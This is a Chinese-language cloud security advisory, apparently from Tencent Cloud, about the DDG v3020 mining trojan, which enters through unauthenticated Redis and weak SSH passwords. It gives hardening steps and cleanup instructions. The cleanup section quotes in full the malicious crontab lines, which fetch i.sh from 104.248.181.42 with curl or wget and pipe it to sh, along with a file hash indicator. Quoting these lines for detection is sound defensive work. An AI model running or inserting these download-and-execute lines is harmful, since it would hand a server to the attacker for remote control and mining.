【风险详情】
  根据腾讯云安全中心的分析,遭受攻击的机器主要感染 DDG 家族v3020木马,该木马包含 downloader 和挖矿模块,主要通过Redis未授权和Linux 弱口令漏洞来实现入侵攻击
,进而远程控制服务器进行挖矿等操作。
【风险等级】
   高风险
【问题影响】
   远程控制主机,消耗主机资源进行挖矿
【修复建议】
   Redis未授权访问:
   1.)为 Redis 添加密码验证(重启Redis才能生效)
   2.)禁止外网访问 Redis(重启Redis才能生效)
   3.)以低权限运行Redis服务(重启Redis才能生效)
   详细操作请参考:http://bbs.qcloud.com/thread-30706-1-1.html
   SSH弱口令:
   修改口令,增加口令复杂度,如包含大小写字母、数字和特殊字符、增加密码长度等。
【挖矿木马清理方法】
   1)crontab定时任务内容如果包含:   “*/15 * * * * (curl -fsSL http://104.248.181.42:8000/i.sh||wget -q -O- http://104.248.181.42:8000/i.sh) | sh”,请从任务列表中删除;
   2)/var/spool/cron/root文件,如果包含:
   “*/15 * * * * curl -fsSL http://104.248.181.42:8000/i.sh | sh”
   “*/15 * * * * wget -q -O- http://104.248.181.42:8000/i.sh | sh”,请从文件中删除该部分内容;
   3)如果存在在/var/spool/cron/crontabs目录,请检查  /var/spool/cron/crontabs/root 文件,如果包含:
   “*/15 * * * * curl -fsSL http://104.248.181.42:8000/i.sh | sh”
   “*/15 * * * * wget -q -O- http://104.248.181.42:8000/i.sh | sh”,请从文件中删除该部分内容;
   4)请检查/usr/bin/、/usr/libexec/、/usr/local/bin/、/tmp目录是否包含以 bcc 结尾的可执行文件,如果存在请计算 md5,如果md5值为:d894bb2504943399f57657472e46c07d,请结束此文件对应的进程,并删除此文件。
   5)清理完成后,请观察一段时间(半天)服务器。如果仍然存在挖矿进程(长时间100%占用CPU),请重装系统以避免进一步的损失。